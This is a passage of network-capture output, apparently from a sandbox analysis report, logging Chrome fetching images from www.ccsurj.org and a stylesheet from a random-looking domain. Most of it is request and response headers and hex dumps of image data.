                                          2025-01-12 00:17:02 UTC16384INData Raw: c3 20 b1 ba d9 af 7b 59 d9 8d 3e a5 57 40 80 2d b8 91 c5 45 d0 83 a4 74 4d bd 32 32 1f b9 7d d3 76 bc 74 94 31 00 d5 c5 f1 1a a2 f9 0a 3b c0 89 96 79 89 82 3a fb 6f 84 76 ed e3 ef 74 5b 57 36 ae ed a3 e5 4e eb e6 d3 55 4f 4f 5e 1e 99 b9 25 29 08 c5 de 72 e9 f4 48 b0 e4 75 1b 9b 11 93 94 a2 4d a3 af 8a 2f a6 9d 83 4f 5f ea bc 73 44 2e e0 59 02 73 02 b2 a1 cc 62 45 07 cc f1 cc 69 9b d5 72 2c 7b 2b d9 8e 41 86 d1 f4 1c 34 13 94 02 4e 22 9b 82 22 28 28 ba af 65 ed af 09 57 48 59 19 76 b6 d8 0b 9f 20 b6 c1 9d 95 48 c1 b0 a6 b3 f9 f8 a6 21 2e 06 34 b6 ad dd 43 84 ed fd 94 d6 85 a8 8c 32 f2 c6 7d 81 47 9c 18 de 1d 7c 49 ca 73 d3 aa a0 03 d9 55 0b 84 9e 49 02 d7 cf c8 a6 64 08 5b 9a 7c bb cd b0 0e 6d e6 5c be 3a df 96 58 5a b8 e5 4d 65 64 68 af 3a b6 30 dc 74 0a
                                          Data Ascii: {Y>W@-EtM22}vt1;y:ovt[W6NUOO^%)rHuM/O_sD.YsbEir,{+A4N""((eWHYv H!.4C2}G|IsUId[|m\:XZMedh:0t
                                          2025-01-12 00:17:02 UTC16384INData Raw: 16 a8 02 d8 2e 82 82 ab aa 6a 9a 17 7d 38 f4 9a 5a 5a 3a 08 dc dc b4 cc fe e5 4f 2c 98 b3 39 95 60 22 7c 2c 0c 84 8d 69 96 5d 3f 5c d9 8c 76 d8 8e c3 7a 9c 42 3e fb dc 68 45 5a 71 11 7b 28 aa 26 a8 a9 e6 4e 29 e4 f6 e2 08 81 8e 38 c9 3e 1a 85 21 41 8c 5d e5 6f 44 f8 3b c6 20 ba 17 99 5f 33 c1 bc 7d 83 73 c5 c3 8e c3 51 22 be 85 a7 4f f8 a8 4a d2 a9 6b aa 22 2f b6 d5 ed c0 3f f5 d4 f3 38 c7 1c 59 7f 76 61 c3 a5 ad f3 4e c3 c2 23 1d e7 bf f0 98 95 d6 1c bd c5 a1 b5 8d f2 ef 97 39 0d a4 b2 9c e4 5a 8c 86 64 4d 2b 9c 7d d1 13 31 76 69 06 e2 64 91 07 44 d1 3f ca a8 bc 55 d5 d2 d7 d6 ff 00 56 79 48 6f 20 ee f2 3b 4c 2c c9 8d bf c8 26 2e 39 45 94 5c 59 d6 ac d7 69 eb ea 18 35 90 ef 2f a1 c4 58 71 dc 57 13 49 22 d1 18 ae e7 35 45 25 2d 75 f7 d7 bf 15 3d b9 64 83
                                          Data Ascii: .j}8ZZ:O,9`"|,i]?\vzB>hEZq{(&N)8>!A]oD; _3}sQ"OJk"/?8YvaN#9ZdM+}1vidD?UVyHo ;L,&.9E\Yi5/XqWI"5E%-u=d
                                          2025-01-12 00:17:02 UTC16384INData Raw: bd 06 20 47 dd 65 15 1c 8e 39 58 9b 6f c9 74 03 13 e5 6e 51 9c 81 d9 df 65 51 b2 6c 60 e4 23 94 b3 2c 76 78 64 95 21 90 8f 25 96 29 a2 c8 16 e3 04 57 07 44 07 50 d1 48 89 44 53 8e ee 9d b8 9b 63 9f 8e 9f 05 66 ea 69 3f 71 bf ae 4a 93 42 19 ed c1 c8 ea aa 98 f9 7c f8 b6 7f 2a b3 ba 6d 09 91 12 61 49 e9 a0 e3 ca 42 12 12 41 28 12 32 28 aa a7 fc c0 28 48 bc 5d 7f 00 7c 73 61 f7 81 f5 e4 83 1d 03 c9 bd c9 eb a7 8a 14 cf 9e 89 0d b8 d8 74 0a 9b 0a 2c 9b 26 89 16 25 74 16 2d 9f 93 4e 8d bd 21 b8 be 28 98 e8 c8 90 52 5d 54 e8 91 09 a0 6d 4d 00 51 75 d2 5d 99 86 2c 38 1a d0 7e 24 8f 97 82 ca 87 7e 98 60 6b 30 93 96 b7 3e 2a cc 72 06 86 ca aa 03 f7 cd 45 8f 6d 7f 4f d3 ab cb b1 43 56 a8 e5 84 b8 af 23 4e 4a 61 95 17 91 e8 f3 98 0e a2 38 e0 22 16 c1 da ea 6a ad 8d
                                          Data Ascii: Ge9XotnQeQl`#,vxd!%)WDPHDScfi?qJB|*maIBA(2((H]|sat,&%t-N!(R]TmMQu],8~$~`k0>*rEmOCV#NJa8"j


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          42192.168.2.449792154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:01 UTC377OUTGET /images/21/11/25/1p6vg4xelj/banner-5.jpg HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:02 UTC304INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:02 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 248821
                                          Last-Modified: Fri, 10 Jan 2025 07:04:24 GMT
                                          Connection: close
                                          ETag: "6780c678-3cbf5"
                                          Expires: Tue, 11 Feb 2025 00:17:02 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:02 UTC16080INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 02 02 02 02 02 02 02 02 02 02 02 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 01 78 04 b0 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 06 03 01 01 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 00 01 02 09 0a ff c4 00 60 10 00 01 03 03 02 04 04 03 05 05 04 05 08 05 02 17 02 01 03 04 05 06 11 00 12 07 13 21 31 08 14 22 41 32 51 61 15 23 42 71 81
                                          Data Ascii: JFIFHHCCx`!1"A2Qa#Bq
                                          2025-01-12 00:17:02 UTC16384INData Raw: 5f 78 11 51 d8 8d 73 8d b3 8e 9b 9c c9 07 51 5d bb 3d b7 68 eb 31 4a 7a 76 81 39 ca 5d b7 b9 5a 22 82 49 af 94 6c 9b f5 68 0e ac 34 aa d4 24 00 89 10 82 92 af 5d ab f8 51 34 c8 24 04 e5 6a c8 d3 ad 95 b6 f1 2b 6f dc 17 1d 4a d4 62 81 41 b9 67 53 a9 10 a4 b9 56 98 e3 04 e2 84 d7 8c 53 61 08 65 55 50 45 7a a2 2a 75 d7 62 8d 81 a0 af 4e d7 81 ba a6 75 08 73 29 c6 4d 4e 83 2e 09 82 ed 22 79 a7 1a 4e 9f f6 88 9a da 11 17 82 88 20 89 8e ed c8 63 fd d5 ce 89 4b 20 49 3a fc 93 56 a9 66 dd c9 e9 05 55 4f 74 d4 b2 8b 5b 53 1f 22 f7 4d 52 b5 98 51 e8 88 9f 54 d5 15 16 06 33 85 5c 7c d7 42 a0 5d f4 25 e9 8f d3 51 33 d9 6d 11 3f 12 17 d3 51 42 b3 1d f0 39 ff 00 3d 45 65 04 a3 9f 6c 7d 53 51 09 6a c4 e8 bd b4 48 08 52 d7 03 ad d4 b9 f8 c5 c3 3a 2a 82 3a cc 9a fc 67 a4
                                          Data Ascii: _xQsQ]=h1Jzv9]Z"Ilh4$]Q4$j+oJbAgSVSaeUPEz*ubNus)MN."yN cK I:VfUOt[S"MRQT3\|B]%Q3m?QB9=Eel}SQjHR:*:g
                                          2025-01-12 00:17:02 UTC16384INData Raw: b2 ee a8 7f 8e e6 ad 70 a6 eb 01 8c cc c5 98 90 e3 2c 67 54 90 0d 1c 98 ce 51 54 30 ba 38 99 77 80 93 50 fc b1 92 a8 9a 0d 14 e3 d4 4a a1 45 aa c1 71 15 43 9d 02 4b 6f 8a 2a 0f 55 e5 c9 16 7f 4f 56 ba 3c 27 03 7d 17 27 8a c2 35 ba 9e af 7b 32 d8 97 03 85 8c cc e2 0d ad 6b 54 7f 62 e2 85 16 97 70 6f 88 73 58 47 49 c2 7f 98 08 6d 87 57 10 76 aa eb 30 76 57 b8 5b 9a d7 24 39 c3 7c 5c 93 2e a9 c1 4b d9 8b 66 f0 7e de a5 d2 af 09 15 48 d4 b8 d4 bf d9 f9 d1 67 73 b6 49 37 64 6d 11 3d c8 a2 3b 57 0b df db 54 e7 31 c4 66 e4 89 90 bd a1 ca 1d b5 38 7f 59 7b 89 bc 3d a2 5d 7c 3d ac d1 1e a8 5c f4 c6 49 ca 85 3d c6 91 71 21 0d 7d 66 0a 3f 83 e7 ab 9e 9e 39 58 4d c2 90 ba 56 ba da a8 b6 e9 b3 2c 9a dd e5 75 f2 58 7e 1d 4e 4d 7a a3 f7 90 e4 1b 64 ab e6 9c ea bb 4b 1f
                                          Data Ascii: p,gTQT08wPJEqCKo*UOV<'}'5{2kTbposXGImWv0vW[$9|\.Kf~HgsI7dm=;WT1f8Y{=]|=\I=q!}f?9XMV,uX~NMzdK
                                          2025-01-12 00:17:02 UTC16384INData Raw: e6 8e 36 e2 22 a8 aa 89 0e 51 70 a8 a8 bf 54 c6 88 1b a5 96 d9 19 c6 ad 55 96 6d d4 57 65 9b 75 15 59 66 dd 5a bb 2d 61 75 6a 59 66 dd 52 96 5a db f4 d5 dd 4b 2d 63 56 a5 96 61 35 14 b2 d6 35 15 65 59 b7 51 5d 96 6d d4 52 cb 5b 75 14 b2 e7 67 d3 56 86 cb 5b 13 e5 a9 75 2c b1 43 e9 a9 75 32 ad 72 f5 2e af 2a da 0a 7c b5 2e ae cb 14 75 2e a5 96 6d 5f d3 52 ea ac b3 1a 97 57 65 ac 6a ee a6 55 9b 75 2e a5 96 b6 7d 75 2e aa cb 5b 35 2e ad 6b 6e ad 5e 55 bc 6a 29 95 6b 1a 8a ec 81 93 15 99 6c 3b 19 f6 d1 c6 9d 15 12 05 fa a6 3f a6 a9 42 12 44 3b 6a 8b 0e 8f 48 a1 a5 3a 2c 88 14 38 cd c4 a6 b6 fb 62 e2 b4 0d b7 ca 45 15 54 e8 aa 3d 32 9a 5c b0 b2 51 67 0b 85 6d bb 76 46 60 51 69 34 b2 47 20 53 e2 c5 74 5a 56 39 e2 09 cc 56 95 ce 77 2c 8f ba 8e f5 dd 85 d2 28 e8
                                          Data Ascii: 6"QpTUmWeuYfZ-aujYfRZK-cVa55eYQ]mR[ugV[u,Cu2r.*|.u.m_RWejUu.}u.[5.kn^Uj)kl;?BD;jH:,8bET=2\QgmvF`Qi4G StZV9Vw,(
                                          2025-01-12 00:17:02 UTC16384INData Raw: c6 ba f4 03 ea d4 cc 5d d1 11 33 f2 d6 65 b2 cb cf db f1 a1 9f c4 2b ca 49 00 fa ea b2 13 af 5f 81 e4 6d 3f a0 6b a7 00 f0 05 e7 ea 5d f5 85 48 9c 18 88 30 4b 88 f5 5c 6d 48 76 e2 80 9f b2 6f 74 49 53 f5 db a5 55 8f 08 f7 4f a1 3a bb d9 52 a9 54 b8 ae d3 22 0a 43 61 5e 79 a1 da 80 3b 0b 71 8a 7b 8e 17 df 5b 63 8c 2c 39 c8 e6 9e fc 4c af 57 6d fe 2a dd 8d 50 6b f5 da 1f 92 28 30 f9 70 25 ba cb 6b c8 86 c8 92 ed 45 c6 57 df 59 e1 a4 8a 46 dd c3 9a d9 35 44 8d 76 87 92 b2 c1 7a 5e 56 f7 85 db 76 fb 6e bf 2e 75 ed 56 ac 44 65 ea c5 58 1b a8 2a b2 f7 34 8c 39 72 10 87 04 0d 8e b0 f7 66 f1 f2 72 5b c5 49 14 f9 b9 a6 b5 36 ff 00 b8 6a 24 ab 58 b5 78 7b 39 d8 f4 6a a4 d6 ea 03 4c 18 af ee 62 03 ef 27 56 14 45 10 d4 76 92 7c 95 74 73 51 b5 ad d0 94 88 6b 33 9d 40
                                          Data Ascii: ]3e+I_m?k]H0K\mHvotISUO:RT"Ca^y;q{[c,9LWm*Pk(0p%kEWYF5Dvz^Vvn.uVDeX*49rfr[I6j$Xx{9jLb'VEv|tsQk3@
                                          2025-01-12 00:17:02 UTC16384INData Raw: 2b bd 95 32 e3 dc 39 51 ac 6a b5 2e cf ae d6 ad 57 6c f9 df 68 52 46 9c e8 1f 91 a8 92 f9 a3 61 fe 42 38 8e 38 fa 7a 49 b5 c9 22 74 dd af 8b 76 c3 18 fa 26 aa 1a 3a 76 0e 08 df a6 ab b9 87 d3 32 48 9c e7 ef 65 05 5a f3 a2 4a ba 38 a7 78 57 6c 5b 57 ed 1a db 54 58 74 7b 4d 6a 6e 4d 78 45 e6 49 24 b2 6c 6e d8 db 46 6e f3 11 bd ab b1 7d 3b 93 5e 0f b4 55 ec 99 91 b2 9d a5 82 f7 71 b6 9e e0 ad 54 ac 3a 17 9b 9b 26 7d 1e e0 b6 6b 13 8d 86 ab d2 44 d6 a2 e4 0b 63 ca b2 ed 3e 9c 4c 32 47 cc 36 c0 b6 22 b3 f7 2a 03 d7 2a ba e2 d4 d0 54 30 79 41 b8 b9 be a7 d3 5e 45 3a f7 3b a7 a7 10 6e 09 cd 42 b7 ac 6a 35 2e 64 39 37 d4 67 12 d2 8c c3 2a a6 8e bc f3 60 12 17 96 a8 ad 88 8b 9b d3 3d f5 87 09 a3 ce e7 4d 23 ae 23 3e 2b 9f c1 36 5b e5 d0 6e a2 ab c6 af 2e 81 7c 85
                                          Data Ascii: +29Qj.WlhRFaB88zI"tv&:v2HeZJ8xWl[WTXt{MjnMxEI$lnFn};^UqT:&}kDc>L2G6"**T0yA^E:;nBj5.d97g*`=M##>+6[n.|
                                          2025-01-12 00:17:02 UTC16384INData Raw: 3d 5c e4 13 8b 31 aa cc f8 71 8e 0b 26 e2 92 88 88 ac 52 69 ac 11 7f db 49 9e e6 3f f7 49 ac 55 5e 75 d4 c3 b5 62 b4 5f 3f eb ac cb a0 99 7c 49 73 67 0d b8 84 b8 cf fe af 4d 1f fb e2 83 ff 00 1d 36 11 77 b7 dd 22 a8 da 27 1f 45 e4 b5 6a 23 2d d0 a9 cd ed 0f bc 65 c1 ed df b0 26 bd 25 4e 81 78 4a 2f 13 95 98 e3 bf 99 87 c4 ea 65 36 04 e9 90 09 9a 0d 0e 12 f9 57 8d a5 4c 86 7f d9 aa 2f e3 d7 1e 8e 36 96 9b 8b af 45 88 48 e6 c8 32 9e 49 26 b3 5e af c1 72 84 e5 2e e3 b8 20 93 8e 57 d5 54 25 bb d5 b6 ea 9c 96 13 a9 2f 46 d1 a5 41 f9 6a 32 96 37 38 82 12 e4 ab 90 30 58 f5 53 a4 2a 95 78 38 61 c4 5b 8b ed c9 73 6a f4 6a bc 78 94 49 b2 d0 25 2b 00 91 e3 ef 11 17 84 c1 72 6e 92 ae 51 7f cb 59 05 0b 4c ed 8f 92 dc 6b 9c da 57 cb cc 26 1d 3e e8 b9 2a b0 2e 93 9f fb
                                          Data Ascii: =\1q&RiI?IU^ub_?|IsgM6w"'Ej#-e&%NxJ/e6WL/6EH2I&^r. WT%/FAj2780XS*x8a[sjjxI%+rnQYLkW&>*.
                                          2025-01-12 00:17:02 UTC16384INData Raw: 6b 48 54 41 25 59 88 ef 56 d9 d9 cc 26 08 05 3e 14 e9 a3 4c 4e 10 a8 96 11 15 89 3b f1 eb 3c 8e cc fe 5a 2d d4 cc b9 5a ac c4 20 56 63 a1 08 b8 9c d4 5e fb 7d f1 a1 b3 ae ac bc 23 3b b3 b8 93 dd 73 ad c9 29 05 b5 db 3a 69 bf 19 cf df 97 29 cd ab 85 15 44 44 5d 21 db aa 08 f4 aa ac 16 49 96 b7 38 8f 49 f4 b0 82 06 b9 2f 96 51 30 9f ae 81 c5 32 ea a5 71 ba b0 54 71 ae d4 6a 34 2a cd 5e 95 70 d0 ce 80 fb 50 11 4a 4b 64 8f 8c a0 28 ed 20 12 b8 66 a1 b7 ae 04 53 d4 ab ac e5 f6 4a 73 55 7e f0 f7 c5 bb 72 25 7a bb e6 e8 57 55 ab 51 a8 b5 1e 03 b5 3b 8a 3b 6d c5 11 47 77 93 60 6d 8f c6 bf c6 b8 14 f9 ea 47 28 72 99 32 15 e9 35 3a e7 a1 a3 70 76 d6 e9 e9 f6 9b c9 1a 9c 1c f0 25 7d d5 12 3e 5b 7b 15 72 bb 40 97 f4 d6 90 f0 98 12 e8 49 19 4a 6e a6 55 37 6d ca af cb
                                          Data Ascii: kHTA%YV&>LN;<Z-Z Vc^}#;s):i)DD]!I8I/Q02qTqj4*^pPJKd( fSJsU~r%zWUQ;;mGw`mG(r25:pv%}>[{r@IJnU7m
                                          2025-01-12 00:17:02 UTC16384INData Raw: ae 21 b8 a2 00 4a ab b9 44 75 d5 78 86 9e 32 f3 ba 57 07 c5 72 a7 7a 0d a7 6a 44 84 ed 85 ce b5 e9 f5 2f b4 a0 56 ab 32 ea b2 44 e7 4c 05 22 6a 2d 35 a5 11 6d 5b 23 17 c8 5e 46 b3 ea 4e e9 b7 3a f3 f3 d6 4c e3 c5 dd bb 0b 72 f5 4d 3a d8 ae ab 9c 3b 8b 5d 83 7a 47 2b 7a b5 12 7d 97 4b 95 2e 2d 1d c7 5b 83 48 a6 cc 07 95 1c 84 d9 02 6f 7d d6 c3 aa 6f 35 ce 15 35 29 b1 63 01 8f c4 2c e7 5b fd c7 d6 dd 15 31 ce 03 45 51 24 13 25 85 68 c3 97 f8 3a 60 95 3e 6b ed af a0 05 d3 06 e1 16 ec 39 15 5f d1 34 4a d3 9a c8 a2 39 75 5e 76 95 b4 1b 88 ee 0a d4 0a 72 74 ca e2 4c 90 6c ba 7d 05 57 5d 2c 21 99 aa 1b e9 af c9 2a 67 78 0a fa 46 30 40 f4 34 89 cb 6f d2 da 7f 74 7a 26 ba ef 37 24 af 06 e3 a9 5c 7a 91 30 88 9f 96 80 94 0b cc 5f 16 9b ee 0e 2d 14 54 74 d6 3d 06 9c
                                          Data Ascii: !JDux2WrzjD/V2DL"j-5m[#^FN:LrM:;]zG+z}K.-[Ho}o55)c,[1EQ$%h:`>k9_4J9u^vrtLl}W],!*gxF0@4otz&7$\z0_-Tt=
                                          2025-01-12 00:17:02 UTC16384INData Raw: 95 95 c4 e0 d4 eb 7e 91 c1 e9 f1 98 a8 30 76 e5 12 ab 3d 52 bd 21 81 61 15 95 95 b5 c9 62 df 54 54 29 0e ae cf 90 e3 eb ae bf 04 cd 16 57 05 c5 ac 93 87 31 75 f7 0a 47 62 f5 b2 7e cc b8 84 ab fc 88 f5 7a f2 db 71 6a 66 d0 83 4c cf fb 38 c8 7a a6 0d 01 4f 6e d3 5f 88 b1 b7 3a ba 9a 56 54 b7 86 7c b7 fe 05 9a 0a 87 42 73 0d ff 00 9a a8 d7 c3 c1 48 83 1a 2c 77 e6 1b f5 58 81 5c a5 57 dd 8c fb 86 91 fc bb c8 5c 9f 41 e1 c9 0a 8b 97 48 b2 b9 e8 9d 74 f8 f0 e8 1f e1 c9 e1 4b 7d 5c ad fb 5a a9 f2 e0 9d 44 4a c5 3e 9d 56 96 4b 50 88 dc c7 e4 3f 0c c0 51 63 30 00 e0 24 c1 2d a2 7b 79 a8 6b d8 97 28 ab 9d 70 7e 84 e1 4f 9e 21 76 83 e5 77 3f 65 d5 38 86 68 f2 bc f8 88 dc 72 50 7d e7 76 5d 90 ec 56 ea 7c 3a 9b 46 a9 5b b0 e9 94 5b 82 95 5f 75 b5 48 aa 65 31 c0 f5 c1
                                          Data Ascii: ~0v=R!abTT)W1uGb~zqjfL8zOn_:VT|BsH,wX\W\AHtK}\ZDJ>VKP?Qc0$-{yk(p~O!vw?e8hrP}v]V|:F[[_uHe1


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          43192.168.2.449793154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:02 UTC354OUTGET /images/tt_bg.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:02 UTC298INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:02 GMT
                                          Content-Type: image/png
                                          Content-Length: 927
                                          Last-Modified: Fri, 10 Jan 2025 07:04:35 GMT
                                          Connection: close
                                          ETag: "6780c683-39f"
                                          Expires: Tue, 11 Feb 2025 00:17:02 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:02 UTC927INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 06 00 00 00 1f 15 c4 89 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                          Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          44192.168.2.449794154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:02 UTC361OUTGET /images/slider-arrow.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:02 UTC299INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:02 GMT
                                          Content-Type: image/png
                                          Content-Length: 1377
                                          Last-Modified: Fri, 10 Jan 2025 07:04:35 GMT
                                          Connection: close
                                          ETag: "6780c683-561"
                                          Expires: Tue, 11 Feb 2025 00:17:02 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:02 UTC1377INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 eb 00 00 00 46 08 06 00 00 00 2d 88 63 e5 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 22 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                          Data Ascii: PNGIHDRF-ctEXtSoftwareAdobe ImageReadyqe<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          45192.168.2.449795154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:02 UTC355OUTGET /images/ico_tz.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:02 UTC298INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:02 GMT
                                          Content-Type: image/png
                                          Content-Length: 672
                                          Last-Modified: Fri, 10 Jan 2025 07:04:35 GMT
                                          Connection: close
                                          ETag: "6780c683-2a0"
                                          Expires: Tue, 11 Feb 2025 00:17:02 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:02 UTC672INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1a 00 00 00 18 08 06 00 00 00 e4 82 ed c5 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 02 04 49 44 41 54 48 c7 b5 95 3d 68 54 41 14 85 bf 9b ac 28 62 c0 40 d0 80 98 42 90 58 d9 05 44 88 e2 0f a2 c4 42 b1 52 14 24 95 36 5a 28 44 82 4d 88 42 d0 5a 89 20 41 50 4b 0b 0b 0b d1 c2 26 bd a0 82 bd 11 4c 10 25 e0 5f 34 c9 67 91 d9 38 3e 76 df ee 92 e4 34 33 cc b9 e7 9e b9 77 e6 cd 83 15 42 1d 56 2f ae 34 4f 99 c1 51 75 d2 25 8c af 85 c1 5e f5 85 ff 63 b8
                                          Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDCpHYs~IDATH=hTA(b@BXDBR$6Z(DMBZ APK&L%_4g8>v43wBV/4OQu%^c


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          46192.168.2.449801122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:03 UTC548OUTGET /css/style.css HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:04 UTC368INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:03 GMT
                                          Content-Type: text/css
                                          Content-Length: 332080
